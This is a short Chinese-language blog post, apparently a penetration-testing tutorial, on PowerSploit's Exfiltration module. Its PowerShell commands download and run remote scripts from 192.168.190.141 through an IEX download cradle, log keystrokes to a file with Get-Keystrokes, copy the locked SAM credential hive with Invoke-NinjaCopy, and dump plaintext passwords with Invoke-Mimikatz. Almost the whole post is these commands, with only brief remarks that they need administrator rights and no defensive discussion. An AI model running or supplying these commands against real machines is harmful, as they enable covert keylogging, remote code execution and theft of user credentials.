POWERSPLOIT-Exfiltration(資訊收集)腳本滲透實戰

Exfiltration子產品

a) 調用Get-Keystrokes記錄使用者的鍵盤輸入。

1）通過IEX下載下傳并調用Get-Keystrokes。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration/Get-Ke
ystrokes.ps1")
           

PS C:\Users\Administrator> Get-Keystrokes -LogPath c:\users\administrator\desktop\1.txt
           

b) 調用Invoke-NinjaCopy複制一些系統無法複制的檔案如sam檔案。

1）通過IEX下載下傳并調用Get-NinjaCopy。

正常情況下複制：

通過Invoke-NinjaCopy進行複制：

PS C:\Users\Administrator> Invoke-NinjaCopy -Path c:\windows\system32\config\SAM -LocalDestination c:\users\administrato
r\desktop\1.sam
           

注意：這個腳本是要有管理者權限下才可以正常執行，否則會報錯，畢竟是要拷貝系統檔案，隻是它做了管理者做不了的事。

c) 調用Invoke-Mimikatz（内網神器）抓取記憶體中的明文密碼。

1）通過IEX下載下傳并調用Invoke-Mimikatz。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration
/Invoke-Mimikatz.ps1")
           

PS C:\Users\Administrator> Invoke-Mimikatz -DumpCreds
           

注意：這個腳本是要有管理者權限下才可以正常執行，否則會報錯，畢竟涉及到密碼之類的敏感資訊，哪怕是管理者想看到明文的，也是很難實作的。

posted @ 2019-03-16 20:59 卿先生 閱讀(...) 評論(...) 編輯 收藏